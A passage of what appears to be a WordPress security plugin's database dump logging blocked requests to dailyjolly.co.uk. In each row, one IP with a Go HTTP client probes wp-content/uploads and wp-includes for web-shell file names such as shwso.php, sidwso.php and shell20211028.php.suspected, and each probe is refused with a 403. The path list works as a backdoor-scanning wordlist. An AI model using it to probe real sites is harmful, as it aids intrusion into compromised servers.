cqZvaCUQPlYJdp',0,1674344581.3488,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/batm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/batm.php\"}','h4lE8NtgbALi0unKT725Mzoa',0,1674344596.8963,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bg_info.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bg_info.php\"}','NHXs1gbojwxi3qOeLFhfzM2k',0,1674344597.2373,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bulk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bulk.php\"}','WLkSveUuRjwKFm4i80IbZVg1',0,1674344597.5735,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bypass.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bypass.php\"}','PCSZfoB7As6Lgm30VbGTdeWE',0,1674344597.9404,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/dokumenty/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/dokumenty\\/about.php\"}','ghvs8k0TRPJzQ2GqNaMWDxtC',0,1674344598.9142,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/external_feed.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/external_feed.php\"}','5KDknPQ6avJjigye7ZGhX0lI',0,1674344599.2708,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/help.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/help.php\"}','NuVEFe7HDjvLKhM93wJdzr2B',0,1674344599.6208,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/ipc9z9.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/ipc9z9.php\"}','tY79zKDNZEIceBJjhlwoVqH6',0,1674344599.9395,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/js.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/js.php\"}','Gzd7UZsxq4HAXvBMiEkToWmu',0,1674344600.2690,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/krop.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/krop.php\"}','EAnCVBP2MglU6IWmpjLQ1e5Y',0,1674344600.6238,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/l.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/l.php\"}','P20Caswv9fEjW5JZ1q3oFOiG',0,1674344601.0088,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/mail.php\"}','Yuf4Lqc8dymrhOUCzgA2iTp3',0,1674344601.3383,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/mindex2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/mindex2.php\"}','7eEfdPhxuLnKtJ2yB5praSc6',0,1674344601.6836,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/old.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/old.php\"}','eAJ7VbKaQ5fh2G6u8q4dtUBT',0,1674344602.0230,224,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/shwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/shwso.php\"}','rKgGkej0zCbmRAnFZad6iIov',0,1674344602.4102,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/uigen_2016/gaxa1.php.jpg','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/uigen_2016\\/gaxa1.php.jpg\"}','9uAtB3ngZLsqYN8lkOEM5RCF',0,1674344602.7670,203,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/up.php\"}','Dn1v4g9wJy0oYSPa78W5pd3z',0,1674344603.1468,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-logout.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/wp-logout.php\"}','cj8RfpJ7sXhbHGyN15i6MzCa',0,1674344603.6306,189,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-xmlrpc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/wp-xmlrpc.php\"}','sMG24zRXSmCExVJiYTdrpcBo',0,1674344603.9861,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/0aa.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/0aa.php.suspected\"}','VSjBIJde1U0rAOwtzQbxuNo7',0,1674344604.3426,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/24.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/24.php\"}','D4T37leovNmMaqjGAW16ExKY',0,1674344604.7005,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/414lfv.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/414lfv.php\"}','oHwGl8nZdm5pDy2Uibfz0NE6',0,1674344605.0563,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/a57bze8931.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/a57bze8931.php\"}','nlp9o6aF2RvbVJI03HmX1gEq',0,1674344605.3821,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/all.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/all.php\"}','xrb2M8D6Y9OBvimGLuIygSfQ',0,1674344605.7071,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/array_reduce.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/array_reduce.php\"}','qI4TmPeOjsH8urzS6DiQxWYG',0,1674344606.0305,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/back.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/back.php\"}','LMAjxq0dQc3tKC2NWsa7P59Z',0,1674344606.3480,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-line.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/block-line.php\"}','y9m0I7wkOsChAUTN2LcMRlSQ',0,1674344606.6896,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cache-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cache-core.php\"}','OHn4vgQMbJNDRZ9VcSd2rkq6',0,1674344607.0095,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/category-template-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/category-template-core.php\"}','pN8SHgU5td3Kvl2hVLiITMJ0',0,1674344607.3461,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-feed-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-feed-ajax.php\"}','zG8PJ7kacdTUViyIC6O1BlFs',0,1674344607.6659,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-join.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-join.php\"}','ojQc3tDZx6mCTUP2NvkJ1MWh',0,1674344607.9978,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-phpmailer-stream.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-phpmailer-stream.php\"}','zKDwRrQf0l2Svmb6UNJtWkCM',0,1674344608.3618,201,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-walker-category-dropdown-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-walker-category-dropdown-ajax-response.php\"}','20jRsnTgyB31zFXKQed7qP8h',0,1674344608.7486,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-cdomize-admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-cdomize-admin.php\"}','b8hZPq69Fes3tydHEI0jva5G',0,1674344609.1127,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-customize-control-wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-customize-control-wp.php\"}','xZkelJR7bFpH0cVIzYUTighj',0,1674344609.4406,189,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-customize-setting-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-customize-setting-meta.php\"}','VmfOIBlANLYDZH2a3i549TjR',0,1674344609.7892,154,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-http-curl-stream.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-http-curl-stream.php\"}','1JKHE0hoD4eVSlFqTAcQg68N',0,1674344610.0999,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-http-encoding-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-http-encoding-ajax.php\"}','kZK3D0uMI1L7jn9hJpNAH82d',0,1674344610.4120,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-metadata-lazyloader-ajax.php\"}','jLR2SvyKioYJtkc4nDI5sMpd',0,1674344610.7521,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-metadata-lazyloader-core.php\"}','qKXaSuD7jcm41YsEWvdy0fJi',0,1674344611.1212,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-oembed-controller-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-oembed-controller-private.php\"}','ELYlDdMcQ6XjfV8C4rmAp3uT',0,1674344611.4591,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-session-tokens-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-session-tokens-core.php\"}','LhxX8RrVQCtWeE1oKDcIpZFq',0,1674344611.7977,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-simplepie-sanitize-kses-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-simplepie-sanitize-kses-cron.php\"}','zXtRfjG14Lkyq8MTEKZ79DCb',0,1674344612.1366,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-upgrade.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-upgrade.php\"}','fRILBu4VMj0tsTPWciqDpz9S',0,1674344612.4566,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-uploads.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-uploads.php\"}','9rjxhoeKiVXQ1Oy5ap2BuL3P',0,1674344612.7706,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-user-request-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-user-request-meta.php\"}','EphzNcj1UvxqrJRoDOTCYLSg',0,1674344613.0955,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-widget-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-widget-ajax-response.php\"}','cOw2aqIB61MEPrDi4sxzoKmW',0,1674344613.4383,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-widget-side.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-widget-side.php\"}','waN9iC4hV372D5BpIzymXnrE',0,1674344613.7890,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cof.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cof.php\"}','MrmVRIFCn6hqkJTLYic7G4a3',0,1674344614.1158,210,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/comment-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/comment-meta.php\"}','H679CWDXedI3vaJLKmnAyl5V',0,1674344614.4819,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/compat-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/compat-ajax-response.php\"}','AGsJrdKk481yaISq6V7LEZov',0,1674344614.8091,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/css.php\"}','6FyhnOgdZfJAbKeki1m5sltS',0,1674344615.1380,208,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cY4bsE.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cY4bsE.php\"}','EVBzWD0hoOpXnPZNQC8RT96e',0,1674344615.5026,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/email.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/email.php\"}','Snj3PkfARd4xVHiBg8ThLGrN',0,1674344615.8288,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/embed-template-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/embed-template-core.php\"}','qchrtl4fDX8Hi1Q9u6P3UbdN',0,1674344616.1726,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/emusuf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/emusuf.php\"}','nFIPxliqR1C05SMZmAu4zGO3',0,1674344616.5224,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/error-protection-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/error-protection-cron.php\"}','Snult9qpmM7ZPRBTDwkYKLWg',0,1674344616.8467,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/feed-rss2-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/feed-rss2-cron.php\"}','DvkV96ZeH0pyXKzxa27F4Ets',0,1674344617.1684,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/flickr.class.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/flickr.class.php\"}','da7TqoWgBhFPL1kcpxzSHrE2',0,1674344617.4976,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/gindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/gindex.php\"}','1Q3fKTFXHCVE5OwU0Y6qzSGt',0,1674344617.8498,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/GOj9m.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/GOj9m.php\"}','dVahi7c6sHfmKwk452u0BJro',0,1674344618.1731,208,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/Hk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/Hk.php\"}','xi0k5DY78aA3CQ2VKydRT6F4',0,1674344618.5484,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/includes.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/includes.php\"}','VBotjLT5YPG1p6yMi0JDRwxI',0,1674344618.8884,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/json.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/json.php\"}','572rTWkpIJSAvQyol3NXZHqm',0,1674344619.2136,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/jvc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/jvc.php\"}','Lk3DNCjxt27yfBguaFq0InPb',0,1674344619.5352,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/kab.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/kab.php\"}','8pctk6CzuFOx71dQPawUnvN9',0,1674344619.8806,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ms_config.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/ms_config.php\"}','Iu7Hp9Zi1ESjzhyYT4dOe3U5',0,1674344620.2183,219,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/nav-menu-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/nav-menu-private.php\"}','IaN5sjRbpzE3WtD4HrhmxlKG',0,1674344620.6039,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/notice.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/notice.php\"}','TIgOAHXlPxhoEGFni9vktY3V',0,1674344620.9516,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/options-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/options-index.php\"}','b3Tz6ks2VvRAxXI8KigwZl7F',0,1674344621.2807,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/PR1eg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/PR1eg.php\"}','5RFINtGOoEKWA3sUcQJaj1kh',0,1674344621.6077,219,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/programa_apoyo_editoriales.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/programa_apoyo_editoriales.php\"}','cIMTdq9ULjeWRgVwKt4H6m02',0,1674344621.9898,226,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/revision-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/revision-meta.php\"}','8ZFPJq2GAcVKoHWL5yE7Usnm',0,1674344622.3766,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/revo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/revo.php\"}','msHzMLZfWaR4DISyTC1c0G2g',0,1674344622.7350,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/RxR_iblkjmoy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/RxR_iblkjmoy.php\"}','O4pdNi3auSMDI8AvXkbhYJeQ',0,1674344623.0646,236,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/safeparam-doctype.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/safeparam-doctype.php\"}','GPFLcgvnsE9Kk76xuSCZa1qb',0,1674344623.5040,154,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/seo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/seo.php\"}','gCpkxT8OAZQfPiB45KwlqebI',0,1674344623.8174,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/settings.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/settings.php\"}','KCnY6URZ0qHeLGI3mPlXv4kT',0,1674344624.1377,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/shell20211028.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/shell20211028.php.suspected\"}','QTko7fMwjnEODKZzS3p0YvqC',0,1674344624.4672,233,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/sidwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/sidwso.php\"}','Be0rchLV3lZbHi85WqfnsoIU',0,1674344624.8563,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/sk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/sk.php\"}','sQJVMeYpD78WLZhvIn0dfkiq',0,1674344625.2020,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/